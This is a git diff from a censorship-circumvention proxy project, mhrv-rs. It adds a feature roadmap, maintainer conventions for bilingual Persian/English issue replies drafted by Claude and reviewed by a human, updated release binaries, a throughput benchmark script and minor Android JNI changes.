+- **`googlevideo_ip` config field** (#300) — separate `google_ip` for googlevideo.com vs other Google domains. Some users have one IP that works for the latter but not the former. Approx 1-2 days of work.
+- **DNS ad-blocking via StevenBlack/hosts** (#377) — opt-in DNS-level filtering during SOCKS5/MITM dispatch. Reduces upstream calls for ad-domains.
+- **DNS caching + parallel dispatch via hickory-resolver** (#377) — replace blocking DNS with cached + parallel resolver. Substantial latency win for browser pageloads.
+- **Tunable strike-counter threshold for auto-blacklist** (#391) — single-deployment users currently hit the auto-blacklist after a few transient errors and end up with no working deployment. Make threshold configurable.
+- **`block_quic` 3-state UI toggle** (#361 / #377): off / drop / reject (default reject = ICMP unreachable, instant Happy Eyeballs failover). 2bemoji's design.
+- **Android UI batch** (#285 / #361 / #261 / #295 / #254 / #313 / #375):
+  - block_quic toggle
+  - youtube_via_relay toggle
+  - listen_host editor
+  - passthrough_hosts editor
+  - Active deployment indicator
+  - Per-deployment quota counters
+  - Android disconnect crash fix (#418)
+- **System proxy toggle** (#432) — Windows/macOS/Linux desktop UI: on Connect set system HTTP proxy to mhrv-rs, on Disconnect clear. With crash-rollback so a hung mhrv-rs doesn't leave system proxy stuck.
+- **`script_ids_url` dynamic config** (#433) — config field pointing at an HTTPS URL that returns a JSON list of deployment IDs. mhrv-rs fetches at startup + every TTL. Lets distributors update deployment lists for many users without each editing config manually.
+- **In-app updater via mhrv-rs's own proxy** (#366) — let mhrv-rs check for updates + download new binaries through its own relay (avoiding the chicken-and-egg of "I can't reach github.com to update mhrv-rs"). Defense in depth.
+- **Temporal jitter** (#369 §2) — randomize timing of batch dispatches to defeat timing-correlation DPI.
+- **`tls_verify` config** (#430 / masterking32 PR #26) — opt-in to skip upstream TLS verification for self-signed certs. Trade-off: opens MITM-of-MITM risk; needs careful design.
+- **`request_timeout` configurable** (#430 / masterking32 PR #25) — currently hard-coded `BATCH_TIMEOUT = 30s`. Make configurable for users on slow networks who want longer timeouts.
+- **CF Workers backend audit** (#380 / #393) — test mhr-cfw compatibility. If it works, document as alternative backend.
+
+### Documentation queued
+
+- **`docs/full-mode-google-bypass.md`** (#420) — dual-routing in xray for users with Iranian VPS xray entry topology
+- **`docs/full-mode-iran-vps-setup.md`** (#420) — full step-by-step for the dual-VPS topology (Iranian xray entry + non-Iranian tunnel-node exit)
+- **`docs/iran-mirrors.md`** (#422) — community-maintained Iranian CDN mirrors for users who can't reach github.com. Pending SHA-256 verification of @amintoorchi's xdevteam.liara.space mirrors.
+- **`docs/win7-build.md`** (#411) — manual Cargo.lock downgrade + cargo update --precise chain for community Win7 32-bit builds. Officially unsupported since v1.7.11 but the build path works for technical users.
+- **`docs/faq/android.md`** — user trust store explanation, which apps work, why Gmail/YouTube don't, root + Magisk option
+- **Updates to README** — short explanation of dual-routing for Google services + xray config snippet
+
+## v1.9.0 (headline release — xmux)
+
+The v1.9.0 release is the **xmux** feature: stream splitting across multiple Apps Script deployments at byte-range level. Currently in design / RFC stage (#369).
+
+### Design goals
+
+- **Survivability under ISP RST** — when one deployment's TCP connection gets RST-injected mid-stream, other deployments continue to carry remaining byte ranges
+- **Latency reduction** — small responses can hit any of N deployments first; mhrv-rs takes the first to respond
+- **Bandwidth aggregation** — large downloads chunk across deployments concurrently. 5 deployments × 10 MB/s each ≈ 50 MB/s aggregate (subject to per-deployment caps)
+- **SABR cliff mitigation** — long YouTube streams chunk into <30s windows across deployments; each window finishes within Apps Script's response cap, then mhrv-rs reassembles
+
+### Open design questions
+
+- **Reordering buffer size** — bigger = more memory; smaller = more retries on out-of-order
+- **Failure recovery** — if a deployment fails mid-chunk, who picks up the half-served range?
+- **Idempotency** — POST requests are tricky; current design only handles GET safely
+- **State consistency** — if some chunks come from cache and some don't, ETag/Last-Modified handling needs care
+- **Configurability** — when does a user want xmux on (latency-sensitive) vs off (quota-sensitive)?
+
+### Implementation timeline
+
+- 4-6 weeks of design + implementation
+- Tag @w0l4i, @2bemoji, @ipvsami, @dazzling-no-more, @euvel as core reviewers when design issue is filed
+
+The design issue should be filed after the v1.8.x batch settles (so the queue isn't too long).
+
+## v1.9.x and beyond (longer-horizon)
+
+These are committed to the project's roadmap but not actively in design. Listed for traceability when users ask "are you planning X?".
+
+- **Cloudflare WARP integration** (#309) — outbound traffic exits via Cloudflare WARP after Apps Script. Lets sites that flag Google IPs (most CF-protected) see traffic as Cloudflare-residential. Feasibility uncertain — needs CF account + WARP wireguard interface integration.
+- **TLS fingerprint randomization** (#369 §2) — randomize JA3/JA4 across deployments. Defeats CF / commercial bot detection.
+- **tunnel-node UPSTREAM_SOCKS5 chain** (#333 kanan-droid) — let tunnel-node forward through a SOCKS5 upstream (e.g., another VPN). Defense in depth + IP variety.
+- **Tier-3 i686-win7-windows-msvc target** (#411) — Windows 7 32-bit support via tier-3 target with `-Z build-std`. Needs nightly Rust. Roadmap v1.9.x or v2.x.
+- **Web frontend / dashboard** (#384) — landing page for the project. Low priority but recurring request.
+- **In-app changelog viewer** — show changelog for new version inside mhrv-rs UI when an update is available (small UX polish).
+
+## How to use this when triaging issues
+
+When a feature request comes in:
+
+1. Match the request to an existing item in this list. If found, reply: "Queued for v1.8.x [or whichever batch]. ETA ~X weeks. See [#NNN](#) for the canonical thread."
+2. If it's a duplicate of an existing roadmap item, close as duplicate of the canonical issue.
+3. If it's a new request not on this list:
+   - Substantive feature: add to v1.8.x or v1.9.x list as appropriate, note the issue number, reply with the planned bucket
+   - Long-horizon / uncertain: add to v1.9.x and beyond, reply that it's noted but no timeline
+   - Architectural impossibility (UrlFetchApp self-loop, MTProto, etc.): close with explanation, link to architectural reference
+
+## Roadmap velocity
+
+The project ships v1.x.y patches frequently — typically 1-3 per week during active development. Minor (1.x) bumps happen every few months. v1.0 → v1.8 took ~12 months. So:
+
+- "v1.8.x ETA" usually means "next 1-2 weeks" for small items, "next 1-2 months" for big items
+- "v1.9.0 ETA" usually means "next 2-3 months"
+- "v1.9.x" or "v2.x" means "no specific timeline, but committed to consider"
+
+Be honest with users about timelines. Iranian users especially appreciate knowing whether to wait or pursue alternatives.
diff --git a/docs/maintainer/references/workflow-conventions.md b/docs/maintainer/references/workflow-conventions.md
new file mode 100644
index 00000000..f3c3ba89
--- /dev/null
+++ b/docs/maintainer/references/workflow-conventions.md
@@ -0,0 +1,174 @@
+# Workflow conventions
+
+These are the writing conventions, formatting rules, and tone guidelines for everything that goes into the public repo or out to users. Internalize these — they're applied to every issue reply, every commit message, every changelog, every PR description.
+
+## The reply marker
+
+Every substantive issue or PR comment ends with this exact footer:
+
+```
+---
+<sub>[reply via Anthropic Claude | reviewed by @therealaleph]</sub>
+```
+
+That's a literal Markdown horizontal rule, then the `<sub>...</sub>` line. The `[reply via Anthropic Claude | reviewed by @therealaleph]` text is verbatim — same brackets, same pipe, same case, same `@therealaleph` mention.
+
+**Why this exists**: replies are drafted by Claude and reviewed by the maintainer before posting. The marker signals this to the user. Users in this community know this convention and rely on it.
+
+**Don't omit it**, don't translate "reviewed by" into Persian, don't paraphrase the format. The marker stays the same regardless of whether the rest of the reply is in Persian or English.
+
+**Where it doesn't go**: very short comments like "Dup of #423." or "Closing as resolved." or close-comments via `gh issue close --comment "..."`. The marker is for substantive replies. Trivial close comments don't need it.
+
+## Persian or English: match the user
+
+The repo's userbase is majority Persian-speaking. Writing in their language matters — both for clarity (technical context lands better) and for respect (assuming everyone wants English is wrong).
+
+**Match what the user wrote**:
+- User wrote in Persian → reply in Persian
+- User wrote in English → reply in English
+- User wrote a mix → match the dominant language; if it's roughly even, prefer Persian since most mixed-language Iranian users default to Persian for nuance and English for technical terms
+
+**Things that always stay in original Latin form**, regardless of reply language:
+- Code blocks (Rust, JSON, bash, JS — all stay as-is)
+- Command-line examples (`gh issue close N`, `cargo build`, `docker run ...`)
+- Technical identifiers: `AUTH_KEY`, `TUNNEL_AUTH_KEY`, `script_id`, `parallel_concurrency`, `disable_padding`, `tunnel_doh`, `bypass_doh_hosts`, `DIAGNOSTIC_MODE`, `passthrough_hosts`, `google_ip`, `mode: "full"` / `mode: "apps_script"`
+- Filename references: `Code.gs`, `CodeFull.gs`, `config.json`, `tunnel-node`, `mhrv-rs.exe`, `MhrvVpnService.kt`, `domain_fronter.rs`
+- URLs and links
+- The reply marker
+- Issue references like `#404`, `#313`
+- HTTP status codes (`502`, `504`, `403`)
+
+**Don't**:
+- Translate command names or function names
+- Mix Persian text into code blocks (unless user did so in their own paste)
+- Use machine-translation for the Persian — write it natively
+
+**Persian register**: write at "polite professional" level — `می‌فرمایید` over `می‌گی`, `لطفاً` (please), full pronouns when needed. Iranian Github users tend to write fairly formally; match that. Use Persian punctuation conventions: `،` (Persian comma), `؛` (Persian semicolon), `؟` (Persian question mark) — though comma in lists is acceptable as `،` or `,` per style preference.
+
+## Public artifact tone
+
+Anything that goes into the public repo — issue replies, PR comments, commit messages, PR descriptions, changelogs — is full prose, written warmly and clearly. Iranian users especially read carefully and brevity reads as cold or dismissive in this context. Use full sentences. Explain reasoning. Be patient.
+
+## Changelog format
+
+Every release has a file at `docs/changelog/vX.Y.Z.md`. The format is strict:
+
+```markdown
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• [bullet 1 in Persian, with markdown links to issue numbers]
+• [bullet 2 in Persian]
+• [bullet 3 in Persian]
+---
+• [same bullet 1 in English, written natively, not machine-translated]
+• [same bullet 2 in English]
+• [same bullet 3 in English]
+```
+
+Conventions:
+
+- **Use `•` (U+2022 bullet)**, not `-` or `*`. The Persian half uses bullets because Markdown unordered lists don't render naturally with Persian RTL text in the GitHub Releases page.
+- **Issue/PR links**: full GitHub URLs in markdown form: `[#404](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/404)`. Don't use bare `#404` in changelogs — they don't auto-link in the Persian section.
+- **Same content both halves** — they cover the same bullets, in the same order. Not necessarily verbatim translation; the Persian is written for Persian readers and may use slightly different framing.
+- **Length**: each bullet should describe what changed AND why it matters. "Added DoH bypass" is too thin; "DoH lookups now route around the Apps Script tunnel via plain TCP, saving the ~2s UrlFetchApp roundtrip per name without losing privacy (DoH is already encrypted)" is the right depth.
+- **Credit contributors**: if a PR landed from a community contributor, say so by name + handle. Persian: `از @euvel`. English: `by @euvel`.
+- **Backwards-incompatible changes**: rare for this project, but flag prominently if any. Add `**شکستگی سازگار**` / `**Breaking change**` prefix.
+
+The starter template is at `assets/changelog-template.md`.
+
+## Commit messages
+
+Format:
+
+```
+<type>: vX.Y.Z — <short summary>
+
+<longer prose body explaining the why and the changes>
+
+[optional: bullet list of specific changes]
+```
+
+Types in regular use:
+- `feat:` — new feature, user-visible (most common)
+- `fix:` — bug fix
+- `chore(releases):` — auto-fired CI commit refreshing prebuilt binaries
+- `chore:` — version bump, dep update, etc.
+- `docs:` — documentation-only changes
+- `ci(workflow-name):` — workflow file changes
+- `feat(area):` — feature scoped to a specific subsystem (e.g., `feat(code.gs):`, `feat(drive):`)
+
+Example commit message:
+
+```
+feat: v1.8.3 — sheet cache + DoH bypass + H1 keepalive + 431 + clearer errors
+
+Three substantive PRs from contributors landed for this release:
+
+- #443 by @euvel: optional spreadsheet-backed response cache in Code.gs.
+  Implements all 5 review suggestions from the design discussion (#400):
+  TTL-aware caching, 35 KB body-size gate, header rewriting on hit,
+  circular buffer for O(1) writes, Vary-aware compound keys.
+
+- #439 by @dazzling-no-more: bypass Apps Script tunnel for known DoH
+  endpoints on TCP/443. Cloudflare/Google/Quad9/AdGuard/NextDNS/OpenDNS/
+  ...
+```
+
+Conventions:
+- **Subject line under 75 chars** (GitHub truncates longer)
+- **Body wrapped at ~75-80 chars** for terminal-readability
+- **PR-merge commits**: when merging PRs via `gh pr merge --merge`, use `--subject` and `--body` to write the merge commit. Format is the same — type prefix, short summary, body explaining what shipped and credit.
+
+## Issue close reasons
+
+Always pass `--reason`:
+
+- `--reason completed` — the user's problem was resolved (their fix worked, or our fix shipped + they confirmed). For close comments, brief acknowledgement is fine; full marker not required.
+- `--reason "not planned"` — duplicate, architectural limit, won't-fix, or stale and unrecoverable. Always link to the canonical thread when closing as duplicate.
+
+For close comments, always include the destination issue if duplicate:
+
+```
+gh issue close N --reason "not planned" --comment "Closing as duplicate of #420 — full discussion + workarounds there."
+```
+
+## File names for reply markdown
+
+Convention: write reply markdown to a temp file (e.g., `/tmp/r-<issue>-<topic>.md`) before posting via `gh issue comment N --body-file <path>`.
+
+Examples:
+- `/tmp/r-404-quota.md` — reply to #404 about a quota observation
+- `/tmp/r-414-decoy.md` — reply to #414 about the decoy body
+- `/tmp/r-pr-merged.md` — generic "merged + included in vX.Y.Z" PR thank-you reply
+
+**Why use files instead of inline `--body`**: the inline `--body` argument runs through the shell, which interprets backticks (\`code\`) and `$()` substitutions. Issue replies frequently contain bash command examples with these patterns. The file approach sidesteps the quoting hell entirely. Use it by default.
+
+The exception is very short replies like `Dup of #423.` — those can use `--body "Dup of #423."` directly.
+
+## Tone
+
+- **Warm but technical**. Iranian users in particular often write apologetically ("sorry for using AI for the translation", "sorry to bother") — answer them as you'd want to be answered: with care, with technical depth, with explicit acknowledgment that their report is valuable.
+- **Don't promise fixes you can't deliver**. The Iran ISP throttle is not something the project can fix; saying "we're working on it" is OK, "we'll fix it next release" is not.
+- **Don't pretend certainty**. v1.8.1's over-confident "AUTH_KEY mismatch" message in the decoy detection cost trust with reporters who turned out to be hitting one of the other candidate causes. v1.8.2 + v1.8.3 are explicitly less assertive ("could be one of the following four/six causes...") because being honest about uncertainty is the better long-term move.
+- **Acknowledge community contributions liberally**. When a contributor's report shaped a roadmap item, say so by name. When a PR lands, thank them in the merge commit + PR comment + changelog. The project runs on goodwill.
+- **Don't apologize excessively** but do correct yourself when wrong. Iterating publicly through wrong hypotheses to a correct one is fine; doubling down on a wrong assertion is not.
+
+## Persian translation specifics
+
+When writing Persian replies:
+
+- **Half-spaces (ZWNJ — `‌`)** in compound words: `می‌خواهم` (not `میخواهم` or `می خواهم`), `نمی‌توانم` (not `نمیتوانم`)
+- **Persian numerals**: optional but common in formal writing — `۲۰،۰۰۰` instead of `20,000`. Code/commands always Latin numerals.
+- **English technical terms in Persian text**: leave them in Latin script with surrounding Persian particles. Example: `از طریق Apps Script روی Google` (not transliterated)
+- **Quotation marks**: Persian uses `«...»` rather than `"..."` for prose. Code/commands use `"..."` regardless.
+- **The reply marker stays in English** as established. Don't translate `reviewed by` to Persian.
+
+## DOPR cycle structure
+
+When triaging a batch of issues/PRs, work through them in this order:
+
+1. **Read everything first** — list PRs, list recently-updated issues, scan headlines. Don't reply to issue 1 before knowing what issues 2-15 contain. Often there are clusters that should be addressed together (e.g., five users all hit the v1.8.0 decoy on the same day).
+2. **Triage by pattern** — match each issue to a pattern from `issue-patterns.md`. Issues that match a pattern get pattern-canonical replies (with specifics drawn from the user's actual log lines). Issues that don't match a pattern get individual attention.
+3. **Substantive PRs first** — if a PR has tests passing and looks mergeable, merge it. Then your subsequent issue replies can reference "shipped in vX.Y.Z" instead of "queued for next release".
+4. **Reply in batches but not as templates** — write each reply to address that user's specific log lines, config quirks, or terminology. Templated replies are easy to spot and erode trust.
+5. **Close cleanly** — if an issue was a duplicate, close at the end of your reply with the close-comment pointing to canonical thread. If it's awaiting user verification, leave open with last comment from you.
+6. **Cut releases when work lands** — don't accumulate fixes across multiple work sessions. Each session that lands user-visible code → one tag → one release.
diff --git a/releases/README.md b/releases/README.md
index d96ede6c..71595e2f 100644
--- a/releases/README.md
+++ b/releases/README.md
@@ -2,11 +2,11 @@
 
 This folder contains the prebuilt binaries from the latest release, committed directly to the repository for users who cannot reach the GitHub Releases page.
 
-Current version: **v1.1.0**
+Current version: **v1.9.25**
 
 | File | Platform | Contents |
 |---|---|---|
-| `mhrv-rs-android-universal-v1.1.0.apk` | Android 7.0+ (all ABIs) | Universal APK — arm64-v8a, armeabi-v7a, x86_64, x86 in one file |
+| `mhrv-rs-android-universal-v1.9.25.apk` | Android 7.0+ (all ABIs) | Universal APK — arm64-v8a, armeabi-v7a, x86_64, x86 in one file |
 | `mhrv-rs-linux-amd64.tar.gz` | Linux x86_64 | `mhrv-rs`, `mhrv-rs-ui`, `run.sh` |
 | `mhrv-rs-linux-arm64.tar.gz` | Linux aarch64 | `mhrv-rs`, `run.sh` (CLI only) |
 | `mhrv-rs-raspbian-armhf.tar.gz` | Raspberry Pi / ARMv7 hardfloat | `mhrv-rs`, `run.sh` (CLI only) |
@@ -45,7 +45,7 @@ Extract `mhrv-rs-windows-amd64.zip`, then double-click `run.bat` inside the extr
 
 ### Android
 
-Copy `mhrv-rs-android-universal-v1.1.0.apk` to your phone, tap it from the Files app, and allow "Install unknown apps" for whichever app is opening the APK (Files, Chrome, etc.). See [the Android guide](../docs/android.md) for the full walk-through of the first-run steps (Apps Script deployment, MITM CA install, VPN permission, SNI tester).
+Copy `mhrv-rs-android-universal-v1.9.25.apk` to your phone, tap it from the Files app, and allow "Install unknown apps" for whichever app is opening the APK (Files, Chrome, etc.). See [the Android guide](../docs/android.md) for the full walk-through of the first-run steps (Apps Script deployment, MITM CA install, VPN permission, SNI tester).
 
 See the [main README](../README.md) for desktop setup (Apps Script deployment, config, browser proxy settings).
 
@@ -55,7 +55,7 @@ See the [main README](../README.md) for desktop setup (Apps Script deployment, c
 
 این پوشه شامل فایل‌های آخرین نسخه است و مستقیماً در ریپو قرار گرفته برای کاربرانی که به صفحهٔ GitHub Releases دسترسی ندارند.
 
-نسخهٔ فعلی: **v1.1.0**
+نسخهٔ فعلی: **v1.9.25**
 
 ### دانلود از طریق ZIP
 
@@ -73,6 +73,6 @@ cd mhrv-rs-macos-arm64
 
 **ویندوز:** فایل `mhrv-rs-windows-amd64.zip` را extract کنید و داخل پوشه روی `run.bat` دو بار کلیک کنید (UAC را قبول کنید تا گواهی MITM نصب شود).
 
-**اندروید:** فایل `mhrv-rs-android-universal-v1.1.0.apk` را روی گوشی کپی کنید، از Files app روی آن tap کنید و اجازهٔ "نصب برنامه‌های ناشناس" را بدهید. راهنمای کامل شروع به کار (دیپلوی Apps Script، نصب CA، اجازهٔ VPN، تستر SNI) در [راهنمای اندروید](../docs/android.md) هست.
+**اندروید:** فایل `mhrv-rs-android-universal-v1.9.25.apk` را روی گوشی کپی کنید، از Files app روی آن tap کنید و اجازهٔ "نصب برنامه‌های ناشناس" را بدهید. راهنمای کامل شروع به کار (دیپلوی Apps Script، نصب CA، اجازهٔ VPN، تستر SNI) در [راهنمای اندروید](../docs/android.md) هست.
 
 برای راه‌اندازی کامل دسکتاپ (دیپلوی Apps Script، config، تنظیم proxy مرورگر) به [README اصلی](../README.md) مراجعه کنید.
diff --git a/releases/mhrv-rs-android-arm64-v8a-v1.9.25.apk b/releases/mhrv-rs-android-arm64-v8a-v1.9.25.apk
new file mode 100644
index 00000000..7bb927c6
Binary files /dev/null and b/releases/mhrv-rs-android-arm64-v8a-v1.9.25.apk differ
diff --git a/releases/mhrv-rs-android-armeabi-v7a-v1.9.25.apk b/releases/mhrv-rs-android-armeabi-v7a-v1.9.25.apk
new file mode 100644
index 00000000..a2f5410d
Binary files /dev/null and b/releases/mhrv-rs-android-armeabi-v7a-v1.9.25.apk differ
diff --git a/releases/mhrv-rs-android-universal-v1.1.0.apk b/releases/mhrv-rs-android-universal-v1.9.25.apk
similarity index 76%
rename from releases/mhrv-rs-android-universal-v1.1.0.apk
rename to releases/mhrv-rs-android-universal-v1.9.25.apk
index 417022c1..130b0c32 100644
Binary files a/releases/mhrv-rs-android-universal-v1.1.0.apk and b/releases/mhrv-rs-android-universal-v1.9.25.apk differ
diff --git a/releases/mhrv-rs-android-x86-v1.9.25.apk b/releases/mhrv-rs-android-x86-v1.9.25.apk
new file mode 100644
index 00000000..e230473a
Binary files /dev/null and b/releases/mhrv-rs-android-x86-v1.9.25.apk differ
diff --git a/releases/mhrv-rs-android-x86_64-v1.9.25.apk b/releases/mhrv-rs-android-x86_64-v1.9.25.apk
new file mode 100644
index 00000000..c2acc3d9
Binary files /dev/null and b/releases/mhrv-rs-android-x86_64-v1.9.25.apk differ
diff --git a/releases/mhrv-rs-linux-amd64.tar.gz b/releases/mhrv-rs-linux-amd64.tar.gz
index 30e2a7ff..49032b72 100644
Binary files a/releases/mhrv-rs-linux-amd64.tar.gz and b/releases/mhrv-rs-linux-amd64.tar.gz differ
diff --git a/releases/mhrv-rs-linux-arm64.tar.gz b/releases/mhrv-rs-linux-arm64.tar.gz
index 121f5b1e..c8cdd96c 100644
Binary files a/releases/mhrv-rs-linux-arm64.tar.gz and b/releases/mhrv-rs-linux-arm64.tar.gz differ
diff --git a/releases/mhrv-rs-linux-musl-amd64.tar.gz b/releases/mhrv-rs-linux-musl-amd64.tar.gz
index 87f3e8c5..3662b8ed 100644
Binary files a/releases/mhrv-rs-linux-musl-amd64.tar.gz and b/releases/mhrv-rs-linux-musl-amd64.tar.gz differ
diff --git a/releases/mhrv-rs-linux-musl-arm64.tar.gz b/releases/mhrv-rs-linux-musl-arm64.tar.gz
index 53a75366..47aa0bb5 100644
Binary files a/releases/mhrv-rs-linux-musl-arm64.tar.gz and b/releases/mhrv-rs-linux-musl-arm64.tar.gz differ
diff --git a/releases/mhrv-rs-macos-amd64-app.zip b/releases/mhrv-rs-macos-amd64-app.zip
index 6d371b1f..08c0a169 100644
Binary files a/releases/mhrv-rs-macos-amd64-app.zip and b/releases/mhrv-rs-macos-amd64-app.zip differ
diff --git a/releases/mhrv-rs-macos-amd64.tar.gz b/releases/mhrv-rs-macos-amd64.tar.gz
index 46c62afb..cdef7eee 100644
Binary files a/releases/mhrv-rs-macos-amd64.tar.gz and b/releases/mhrv-rs-macos-amd64.tar.gz differ
diff --git a/releases/mhrv-rs-macos-arm64-app.zip b/releases/mhrv-rs-macos-arm64-app.zip
index cf5cf66b..7312941c 100644
Binary files a/releases/mhrv-rs-macos-arm64-app.zip and b/releases/mhrv-rs-macos-arm64-app.zip differ
diff --git a/releases/mhrv-rs-macos-arm64.tar.gz b/releases/mhrv-rs-macos-arm64.tar.gz
index c19d34d8..58af3249 100644
Binary files a/releases/mhrv-rs-macos-arm64.tar.gz and b/releases/mhrv-rs-macos-arm64.tar.gz differ
diff --git a/releases/mhrv-rs-openwrt-mipsel-softfloat.tar.gz b/releases/mhrv-rs-openwrt-mipsel-softfloat.tar.gz
new file mode 100644
index 00000000..85941964
Binary files /dev/null and b/releases/mhrv-rs-openwrt-mipsel-softfloat.tar.gz differ
diff --git a/releases/mhrv-rs-raspbian-armhf.tar.gz b/releases/mhrv-rs-raspbian-armhf.tar.gz
index 72726890..c344ea83 100644
Binary files a/releases/mhrv-rs-raspbian-armhf.tar.gz and b/releases/mhrv-rs-raspbian-armhf.tar.gz differ
diff --git a/releases/mhrv-rs-windows-amd64.zip b/releases/mhrv-rs-windows-amd64.zip
index baed0917..f89beb2b 100644
Binary files a/releases/mhrv-rs-windows-amd64.zip and b/releases/mhrv-rs-windows-amd64.zip differ
diff --git a/scripts/bench-pipeline.sh b/scripts/bench-pipeline.sh
new file mode 100755
index 00000000..65fd2aba
--- /dev/null
+++ b/scripts/bench-pipeline.sh
@@ -0,0 +1,140 @@
+#!/usr/bin/env bash
+#
+# bench-pipeline.sh — compare throughput: serial (depth=1) vs pipelined (depth=10)
+#
+# Builds mhrv-rs twice (patching the INFLIGHT_ACTIVE constant), runs each
+# as a local SOCKS5 proxy, downloads through the full tunnel, reports.
+#
+# Usage:
+#   ./scripts/bench-pipeline.sh [CONFIG_FILE]
+#
+# Default: config.json
+
+set -euo pipefail
+
+CONFIG="${1:-config.json}"
+RUNS=3
+SOCKS_PORT=18088
+HTTP_PORT=18087
+TEST_URL="https://speed.cloudflare.com/__down?bytes=5000000"
+SRC="src/tunnel_client.rs"
+TMPDIR_BENCH=$(mktemp -d)
+
+cleanup() {
+    rm -rf "$TMPDIR_BENCH"
+    kill $PROXY_PID 2>/dev/null || true
+    # Restore original constant
+    sed -i '' "s/^const INFLIGHT_ACTIVE: usize = [0-9]*/const INFLIGHT_ACTIVE: usize = 10/" "$SRC" 2>/dev/null || true
+}
+trap cleanup EXIT
+
+if [ ! -f "$CONFIG" ]; then
+    echo "ERROR: Config not found: $CONFIG"
+    exit 1
+fi
+
+echo "╔══════════════════════════════════════════════╗"
+echo "║     Pipeline Throughput Benchmark            ║"
+echo "╠══════════════════════════════════════════════╣"
+echo "║ Config:    $CONFIG"
+echo "║ Test URL:  $TEST_URL"
+echo "║ Runs:      $RUNS per mode"
+echo "╚══════════════════════════════════════════════╝"
+echo ""
+
+# Write a temp config with our ports
+TEMP_CONFIG="$TMPDIR_BENCH/config.json"
+python3 -c "
+import json
+with open('$CONFIG') as f:
+    c = json.load(f)
+c['listen_port'] = $HTTP_PORT
+c['socks5_port'] = $SOCKS_PORT
+c['log_level'] = 'warn'
+with open('$TEMP_CONFIG', 'w') as f:
+    json.dump(c, f)
+"
+
+run_test() {
+    local label="$1"
+    local binary="$2"
+    echo "━━━ $label ━━━"
+
+    $binary -c "$TEMP_CONFIG" &
+    PROXY_PID=$!
+    sleep 3
+
+    if ! kill -0 $PROXY_PID 2>/dev/null; then
+        echo "  ERROR: Proxy failed to start"
+        return
+    fi
+
+    # Wait for proxy
+    for attempt in $(seq 1 15); do
+        if curl -s --socks5-hostname localhost:$SOCKS_PORT --connect-timeout 5 -o /dev/null https://www.google.com 2>/dev/null; then
+            break
+        fi
+        sleep 1
+    done
+
+    local total_bytes=0
+    local total_time=0
+
+    for i in $(seq 1 $RUNS); do
+        local result
+        result=$(curl -s --socks5-hostname localhost:$SOCKS_PORT \
+            -o /dev/null \
+            -w '%{size_download} %{time_total} %{speed_download}' \
+            --connect-timeout 30 \
+            --max-time 90 \
+            "$TEST_URL" 2>/dev/null || echo "0 999 0")
+
+        local bytes time_s speed
+        bytes=$(echo "$result" | awk '{print $1}')
+        time_s=$(echo "$result" | awk '{print $2}')
+        speed=$(echo "$result" | awk '{printf "%.0f", $3/1024}')
+
+        total_bytes=$((total_bytes + ${bytes%.*}))
+        total_time=$(echo "$total_time + $time_s" | bc)
+
+        printf "  Run %d: %.1fs  %s KB/s\n" "$i" "$time_s" "$speed"
+    done
+
+    local avg_speed avg_time
+    avg_speed=$(echo "scale=1; $total_bytes / $total_time / 1024" | bc 2>/dev/null || echo "0")
+    avg_time=$(echo "scale=1; $total_time / $RUNS" | bc 2>/dev/null || echo "0")
+    printf "  ➜ Average: %s KB/s  (%.1fs per download)\n\n" "$avg_speed" "$avg_time"
+
+    kill $PROXY_PID 2>/dev/null || true
+    wait $PROXY_PID 2>/dev/null || true
+    sleep 1
+
+    echo "$label|$avg_speed|$avg_time" >> "$TMPDIR_BENCH/results.txt"
+}
+
+# Build serial (depth=1)
+echo "Building serial mode (INFLIGHT_ACTIVE=1)..."
+sed -i '' "s/^const INFLIGHT_ACTIVE: usize = [0-9]*/const INFLIGHT_ACTIVE: usize = 1/" "$SRC"
+cargo build --release 2>&1 | tail -1
+cp target/release/mhrv-rs "$TMPDIR_BENCH/mhrv-serial"
+
+# Build pipelined (depth=10)
+echo "Building pipelined mode (INFLIGHT_ACTIVE=10)..."
+sed -i '' "s/^const INFLIGHT_ACTIVE: usize = [0-9]*/const INFLIGHT_ACTIVE: usize = 10/" "$SRC"
+cargo build --release 2>&1 | tail -1
+cp target/release/mhrv-rs "$TMPDIR_BENCH/mhrv-pipelined"
+
+echo ""
+
+# Run tests
+run_test "Serial (depth=1)" "$TMPDIR_BENCH/mhrv-serial"
+run_test "Pipelined (depth=10)" "$TMPDIR_BENCH/mhrv-pipelined"
+
+# Summary
+echo "╔══════════════════════════════════════════════╗"
+echo "║               RESULTS                       ║"
+echo "╠══════════════════════════════════════════════╣"
+while IFS='|' read -r label speed time; do
+    printf "║  %-25s %6s KB/s  %5ss\n" "$label" "$speed" "$time"
+done < "$TMPDIR_BENCH/results.txt"
+echo "╚══════════════════════════════════════════════╝"
diff --git a/src/android_jni.rs b/src/android_jni.rs
index 6f467bec..a551e83e 100644
--- a/src/android_jni.rs
+++ b/src/android_jni.rs
@@ -42,7 +42,7 @@ struct Running {
     rt: Option<Runtime>,
     /// Keep an Arc to the DomainFronter so `statsJson(handle)` can read the
     /// live stats without going through the async server. `None` for
-    /// google-only / full-only configs where the fronter isn't used.
+    /// direct / full-only configs where the fronter isn't used.
     fronter: Option<Arc<crate::domain_fronter::DomainFronter>>,
 }
 
@@ -199,7 +199,7 @@ pub extern "system" fn Java_com_therealaleph_mhrv_Native_startProxy(
         // Try to build the runtime first — if allocation fails we want to
         // know before spinning up anything stateful.
         let rt = match tokio::runtime::Builder::new_multi_thread()
-            .worker_threads(2)
+            .worker_threads(4)
             .enable_all()
             .thread_name("mhrv-worker")
             .build()
@@ -457,7 +457,7 @@ pub extern "system" fn Java_com_therealaleph_mhrv_Native_testSni<'a>(
 
 /// `Native.statsJson(long handle)` -> String. Returns a JSON blob with the
 /// live `StatsSnapshot` for a running proxy, or an empty string if the
-/// handle is unknown or the proxy has no fronter (google_only / full modes).
+/// handle is unknown or the proxy has no fronter (direct / full modes).
 ///
 /// Cheap — just reads a handful of atomics. The Kotlin UI polls this on a
 /// timer to render the "Usage today (estimated)" card.
@@ -482,3 +482,67 @@ pub extern "system" fn Java_com_therealaleph_mhrv_Native_statsJson<'a>(
     }));
     env.new_string(out).map(|s| s.into_raw()).unwrap_or(std::ptr::null_mut())
 }
+
+/// `Native.pipelineDebugJson()` -> String. Snapshot of pipeline debug state:
+/// elevated session count, batch semaphore usage, recent ramp/drop events.
+/// Temporary — for the debug overlay.
+#[no_mangle]
+pub extern "system" fn Java_com_therealaleph_mhrv_Native_pipelineDebugJson<'a>(
+    env: JNIEnv<'a>,
+    _class: JClass,
+) -> jstring {
